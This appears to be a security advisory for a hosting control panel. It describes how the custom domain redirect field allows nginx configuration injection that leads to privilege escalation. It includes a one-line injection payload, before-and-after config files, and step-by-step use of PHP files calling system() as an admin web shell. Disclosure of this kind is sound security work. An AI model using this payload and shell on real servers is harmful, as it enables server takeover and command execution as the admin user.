8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
40.4%
Improper input validation allows an attacker to privilege escalation and can make crash nginx server.
There is no input validation in the v-add-web-domain-redirect#L82, and βv-redirect-customβ input on the βEdit Web Domainβ page, inputs are written directly to the /home/user/conf/web/domain.com/nginx.conf_redirect
file. This file is included in /home/user/conf/web/domain.com/nginx.conf
file.
/home/user/conf/web/domain.com/nginx.conf
...
location ~ /\.(?!well-known\/|file) {
deny all;
return 404;
}
include /home/test/conf/web/poc.com/nginx.conf_*;
}
/home/user/conf/web/domain.com/nginx.conf_redirect
file before payload (input is βasdβ)
if ($host != "asd") {
return 301 $scheme://asd$request_uri;
}
/home/user/conf/web/domain.com/nginx.conf_redirect
file after payload
if ($host != "redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #") {
return 301 $scheme://redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #$request_uri;
}
Payload ( has to be one line! )
redStar$request_uri; ## " ) {} location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock; } if ( $host = false ) { #
[0] login as user
[1] Create a domain in dashbard
[2] go to Files in top bar
[3] go to βpublic_htmlβ folder and create a php file contains like below, visit php file with browser, prepare your payload with fullpath and hostname information.
x.php
<?php
echo getcwd();
echo "<br>";
system("hostname");
[4] go to βEdit Web Domainβ page in dashboard, select βEnable domain redirectionβ then select βRedirect visitors to a custom domain or web addressβ, enter payload to text box and click save button.
[5] go to βpublic_htmlβ folder, create a php file named adminShell.php
adminShell.php
<?php
system("id; whoami;");
[6] Visit /adminShell.php
with browser, commands running as βadminβ user.
https://drive.google.com/file/d/1ynnw0C-5dbtxW21aLt4jemUPrCthyXEj/view?usp=sharing
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
40.4%